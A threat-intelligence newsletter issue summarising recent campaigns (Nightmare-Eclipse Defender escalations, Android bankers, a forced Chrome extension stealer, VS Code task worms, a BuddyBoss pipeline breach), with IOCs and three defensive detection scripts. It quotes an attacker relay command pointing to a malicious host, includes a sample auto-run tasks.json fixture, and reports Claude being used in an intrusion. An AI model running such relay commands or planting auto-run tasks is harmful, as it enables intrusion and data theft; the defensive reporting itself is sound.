EvilBit Threat Digest - Patch Now or Pray Later: Nightmare-Eclipse, VPN Pivots, and Four Fresh Android Bankers
Nightmare-Eclipse Defender LPEs land in real intrusions, four Android bankers share 800+ targets, and Claude helps hijack BuddyBoss WordPress.
Before we get into it: KryptoKat founded this digest and is now heading back to the frontlines of cyberdefense, so I'm carrying it forward with the same defender lens she built it on. She set a high bar for no-fluff defender intel, and my job now is to keep it there.
This week's noise floor is loud with supply-chain weirdness, phishing that laughs at your email gateway, and some genuinely nasty Android banking families that treat accessibility services like an all-access backstage pass. Four distinct campaigns hit over 800 financial, crypto, and social apps, while defenders debate whether "just don't sideload" counts as strategy.
The real operator headline is the first confirmed real-world sighting of Nightmare-Eclipse privilege-escalation tooling after a FortiGate SSL VPN compromise. BlueHammer (CVE-2026-33825) got its patch in Microsoft's April 2026 release; RedSun and UnDefend remain unpatched as of this writing. The crew also dropped BeigeBurrow, a Go-compiled yamux relay that runs as agent.exe -server staybud.dpdns.org:443 -hide and gives the operator pivot access to anything the compromised host can reach. If your VPN logs show logins from Russia, Singapore, and Switzerland in the same session, start hunting user-writable paths for FunnyApp.exe (a public BlueHammer build pulled straight from GitHub, typically dropped in \Pictures\), RedSun.exe (often in \Downloads\), undef.exe, and z.exe. Defender quarantine hits on Exploit:Win32/DfndrPEBluHmr.BZ are the obvious tell.
Huntress dropped the primary details; the same cluster showed up in a parallel Cybersecurity News writeup with overlapping IOCs. Patch the Defender antimalware platform to at least 4.18.26030.3011, block the listed IPs (78.29.48.29, 212.232.23.69, 179.43.140.214), and watch for staybud.dpdns.org. The tradecraft here is classic post-VPN recon followed by local escalation attempts that mostly failed until the tunnel went up. Blue teams should treat this as a live fire drill for VPN initial access plus LPE chains.
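To turn the hunting guidance above into something runnable, here is an added example (not Huntress's or this digest's own code) that applies the published indicators to constructed sample telemetry: it flags VPN sessions whose logins span several countries, and host events that match the staged LPE binaries in user-writable folders, the BeigeBurrow command line, the Defender detection name and the listed IPs. The event field names and the sample records are assumptions.

```python
import re
from collections import defaultdict

# Indicators quoted in the digest above (Huntress / Cybersecurity News reporting).
IOC_IPS = {"78.29.48.29", "212.232.23.69", "179.43.140.214"}
IOC_DOMAIN = "staybud.dpdns.org"
IOC_FILES = {"funnyapp.exe", "redsun.exe", "undef.exe", "z.exe"}
IOC_DEFENDER_SIG = "Exploit:Win32/DfndrPEBluHmr.BZ"
# User-writable profile folders where the LPE binaries were staged.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(pictures|downloads|appdata)\\", re.I)


def flag_vpn_sessions(events, min_countries=2):
    """Session ids whose logins come from more than one country."""
    seen = defaultdict(set)
    for ev in events:
        if ev["type"] == "vpn_login":
            seen[ev["session"]].add(ev["country"])
    return sorted(s for s, c in seen.items() if len(c) >= min_countries)


def flag_host_events(events):
    """(tag, evidence) pairs for host telemetry matching the Nightmare-Eclipse cluster."""
    hits = []
    for ev in events:
        if ev["type"] == "file_create":
            name = ev["path"].rsplit("\\", 1)[-1].lower()
            if name in IOC_FILES and USER_WRITABLE.search(ev["path"]):
                hits.append(("lpe_tool_staged", ev["path"]))
        elif ev["type"] == "process":
            cl = ev["cmdline"].lower()
            if "agent.exe" in cl and "-server" in cl and IOC_DOMAIN in cl:
                hits.append(("beigeburrow_relay", ev["cmdline"]))
        elif ev["type"] == "defender" and ev["threat"] == IOC_DEFENDER_SIG:
            hits.append(("bluehammer_quarantine", ev["host"]))
        elif ev["type"] == "netconn" and ev["dst"] in IOC_IPS:
            hits.append(("c2_ip", ev["dst"]))
    return hits


# Constructed sample telemetry (assumed schema), not real logs.
SAMPLE = [
    {"type": "vpn_login", "session": "s1", "user": "jdoe", "country": "RU"},
    {"type": "vpn_login", "session": "s1", "user": "jdoe", "country": "SG"},
    {"type": "vpn_login", "session": "s1", "user": "jdoe", "country": "CH"},
    {"type": "vpn_login", "session": "s2", "user": "asmith", "country": "US"},
    {"type": "file_create", "path": r"C:\Users\jdoe\Pictures\FunnyApp.exe"},
    {"type": "file_create", "path": r"C:\Program Files\Vendor\z.exe"},  # not user-writable
    {"type": "process", "cmdline": "agent.exe -server staybud.dpdns.org:443 -hide"},
    {"type": "defender", "host": "WS01", "threat": IOC_DEFENDER_SIG},
    {"type": "netconn", "dst": "212.232.23.69"},
]
```

Run flag_vpn_sessions(SAMPLE) and flag_host_events(SAMPLE) against your own normalized events; the z.exe under Program Files is deliberately left unflagged because the filter only cares about user-writable staging paths.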
Android bankers are running four concurrent campaigns
Zimperium zLabs documented RecruitRat, SaferRat, Astrinox, and Massiv operating in parallel. They abuse the Session Installation API, accessibility services, and overlay attacks to steal credentials from over 800 legitimate banking, crypto, and social media apps. The Session Installation trick lets them sideload without the usual scary prompts; accessibility gives them input injection and screen capture on demand.
The report includes more than 100 SHA256 hashes, solid MITRE mappings (T1417.001 for accessibility abuse, T1513 screen capture, T1636 credential stealing, and a laundry list of defense evasion), and details on C2 protocols. Corporate devices running BYOD policies are the obvious soft target. Review accessibility grants, block sideloading outside the Play Store, and deploy mobile threat defense that actually looks for overlay and accessibility abuse patterns. This is the kind of campaign that makes "we use MDM" feel like a participation trophy.
Chrome extensions, ClickFix, and an exposed C2 database
A Brazilian banking stealer campaign used ClickFix lures and PowerShell to force-install a Chrome extension (ooidffpmpnebkcjneofkaidbcafefiag) via enterprise policy abuse. The extension hijacks sessions, logs keystrokes, captures screens, and supports real-time Pix fraud. The kicker? The operator left the entire C2 unauthenticated, exposing data on 59 victims including the enrollment token you should revoke yesterday.
Breakglass Intelligence published the full autopsy, including the unauthenticated API endpoints that let anyone query the stolen data. Block the listed hashes, watch for ExtensionInstallForcelist registry changes, and treat any unexpected Chrome Cloud Management enrollment as a five-alarm incident. This one feels like the attacker got excited about the persistence technique and forgot to close the barn door.
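As an added example (not Breakglass Intelligence's or this digest's code), the script below audits a reg export of the Chrome policy key for the forced extension id and for an enrollment token nobody provisioned. It assumes the standard ExtensionInstallForcelist value format (extension id, semicolon, update URL) and that the enrollment token lives in the CloudManagementEnrollmentToken policy value; the allowlist id and the registry dump are constructed.

```python
import re

# Extension id named in the Breakglass Intelligence writeup above.
KNOWN_BAD_IDS = {"ooidffpmpnebkcjneofkaidbcafefiag"}
# Hypothetical allowlist id standing in for extensions IT actually deploys.
ALLOWLIST_IDS = {"abcdefghijklmnopabcdefghijklmnop"}
GOOGLE_UPDATE = "https://clients2.google.com/service/update2/crx"
CHROME_POLICY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome"
KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')


def parse_reg_export(text):
    """Minimal .reg parser: {key_path: {value_name: data}} for REG_SZ values only."""
    tree, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if m := KEY_RE.match(line):
            current = m.group(1)
            tree.setdefault(current, {})
        elif (m := VAL_RE.match(line)) and current:
            tree[current][m.group(1)] = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
    return tree


def audit_chrome_policy(tree, expect_cbcm=False):
    """Flag forced extensions outside the allowlist and an enrollment token nobody set."""
    findings = []
    chrome = tree.get(CHROME_POLICY, {})
    if "CloudManagementEnrollmentToken" in chrome and not expect_cbcm:
        findings.append(("unexpected_cbcm_enrollment", chrome["CloudManagementEnrollmentToken"]))
    for data in tree.get(CHROME_POLICY + r"\ExtensionInstallForcelist", {}).values():
        ext_id, _, update_url = data.partition(";")  # "<id>;<update url>" format
        if ext_id in KNOWN_BAD_IDS:
            findings.append(("known_bad_forced_extension", ext_id))
        elif ext_id not in ALLOWLIST_IDS:
            findings.append(("unapproved_forced_extension", ext_id))
        if update_url and update_url != GOOGLE_UPDATE:
            findings.append(("non_google_update_url", update_url))
    return findings


# Constructed reg export output, not taken from a real host.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome]
"CloudManagementEnrollmentToken"="CONSTRUCTED-TOKEN-0000"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]
"1"="abcdefghijklmnopabcdefghijklmnop;https://clients2.google.com/service/update2/crx"
"2"="ooidffpmpnebkcjneofkaidbcafefiag;https://clients2.google.com/service/update2/crx"
"""
```

A real reg export writes UTF-16 with a BOM, so open it with encoding="utf-16" before handing the text to parse_reg_export; pass expect_cbcm=True only where Chrome Browser Cloud Management is genuinely deployed.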
Supply chain hits keep the weirdness high
Void Dokkaebi (North Korea-aligned) is infecting developer repositories through fake job interview lures, injecting tasks.json and JavaScript into 750+ repos including legitimate OSS projects. The worm-like propagation uses VS Code tasks to spread, then drops DEV#POPPER RAT and stealers over blockchain C2. Trend Micro's report includes solid mitigations: add .vscode to .gitignore, enforce signed commits, and scrutinize any coding test that wants you to run a full workspace.
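An added example (not Trend Micro's tooling or anything from the campaign) of the repo check those mitigations imply: it walks a checkout for .vscode/tasks.json files and reports any task configured to run automatically when the folder is opened (the runOptions.runOn folderOpen setting), which is the VS Code mechanism an auto-executing task needs. The sample repository and its task definitions are constructed.

```python
import json
import os
import re
import tempfile

COMMENT_RE = re.compile(r"^\s*//.*$", re.M)  # tasks.json is JSONC; strip // comment lines


def load_jsonc(path):
    with open(path, encoding="utf-8") as f:
        text = COMMENT_RE.sub("", f.read())
    return json.loads(re.sub(r",(\s*[}\]])", r"\1", text))  # drop trailing commas


def scan_repo_for_autorun_tasks(root):
    """Return (tasks.json path, label, command) for every task set to run on folder open."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            try:
                tasks = load_jsonc(path).get("tasks", [])
            except (ValueError, OSError):
                findings.append((path, "<unparseable>", ""))  # worth a manual look too
                continue
            for task in tasks:
                run_on = (task.get("runOptions") or {}).get("runOn")
                if run_on == "folderOpen":
                    cmd = " ".join([task.get("command", "")] + list(task.get("args", [])))
                    findings.append((path, task.get("label", "?"), cmd.strip()))
    return findings


# Constructed repository layout for demonstration, not a real project.
def make_sample_repo():
    root = tempfile.mkdtemp()
    vscode = os.path.join(root, "subproject", ".vscode")
    os.makedirs(vscode)
    with open(os.path.join(vscode, "tasks.json"), "w", encoding="utf-8") as f:
        f.write("""{
  // looks like ordinary dev tooling, but fires as soon as the folder is opened
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]},
    {"label": "setup", "type": "shell", "command": "node",
     "args": ["./scripts/postinstall.js"], "runOptions": {"runOn": "folderOpen"}},
  ]
}""")
    return root
```

Point scan_repo_for_autorun_tasks at any checkout you are about to open, including a coding-test workspace; the ordinary build task in the sample is deliberately not reported, only the one that auto-runs.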
Separately, a French actor used Claude to compromise the BuddyBoss WordPress platform's CI/CD pipeline, backdoored updates on the official CDN, and exfiltrated 29 GB of SQL dumps, 150k+ user accounts, and live Stripe keys from 246 sites. The poisoned releases are BuddyBoss Platform 2.20.3 and BuddyBoss Theme 2.19.2; if you're running either, assume compromise and roll back. Ctrl-Alt-Intel's two-part analysis (part 1, part 2) reads like a sci-fi heist gone corporate, and Cybernews independently corroborates the scope. Disable auto-updates, revert to known-good backups, and rotate every secret you can find.
On the lighter side, someone hid BASE64-encoded, XOR-obfuscated PE malware inside valid WAV files after a Telnyx PyPI supply-chain compromise. SANS ISC handler Didier Stevens published decoding scripts. Old-school stego never dies; it just finds new containers.
QR codes, SIM farms, and the usual IoT misery
ReversingLabs detailed evolving quishing that splits and nests QR codes inside PDFs and images to dodge SPF/DKIM/DMARC checks. Kimsuky is heavily involved. Automated QR decoding and reputation scoring on extracted URLs are now table stakes.
Infrawatch mapped 87 ProxySmart SIM farms across 17 countries feeding mobile proxy services for fraud and evasion. The shared control plane makes takedowns harder. Hunt the specific SHA-256 hashes and watch for multi-carrier egress patterns.
The usual background radiation continues: a Nexcorium Mirai variant hitting TBK DVRs and Huawei gear, a concentrated fleet of 21 IPs behind nearly half of recent RDP scanning (AS213438/ColocaTel), and the perennial cargo-theft operators abusing RMM tools like ScreenConnect, Pulseway, and SimpleHelp.
Closing thought
The overlap between state actors, MaaS operators, and opportunistic criminals is blurring faster than your average EDR can keep up. One crew uses blockchain for C2, another hides payloads in audio files, and a third leaves their victim database wide open while force-installing Chrome extensions. The common thread is persistence through trusted mechanisms: accessibility services, enterprise policies, CI/CD pipelines, and job interview desperation.
Patch the things that matter this week (Defender for CVE-2026-33825, marimo if you're running notebooks, and anything Cisco FMC related). Rotate secrets like it's going out of style. And maybe stop letting candidates run arbitrary VS Code workspaces during interviews. Your future self will thank you.
Mind the threads. The web remembers.
~ UncleSp1d3r
Also crossed my desk this week
- ChainShell: MuddyWater's Russian MaaS Link (JUMPSEC)
- ALBIROX Malware Analysis (JUMPSEC)
- APT35 Preset Scouting with Cyber-Kinetic Linkage for 'Epic Rage' Actions
- The Coordinated Embassy Hunt: Unmasking the DPRK-linked GitHub C2 Espionage Campaign (StrikeReady)
- New PureRAT Campaign Uses PNG Files To Conceal Fileless Payloads
- Beyond BITTER: MENA Civil Society Targeted in Hack-For-Hire Operation (Lookout)
- Dead Souls in Infrastructure: Zmiy's Attack on Healthcare (Solar 4RAYS)
- Live off the Land? How About Bringing Your Own Island? UNC1945 Overview (Mandiant)
- Magento Developers Impersonated in Targeted GitHub Malware Operation (Sansec)
- Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud
- Finding the Unknown Unknowns, Part 4 (NilePhish, SneakyChef, MuddyWater, +1) (StrikeReady)
- Investigating Storm-2755: "Payroll Pirate" Attacks Targeting Canadian Employees (HivePro)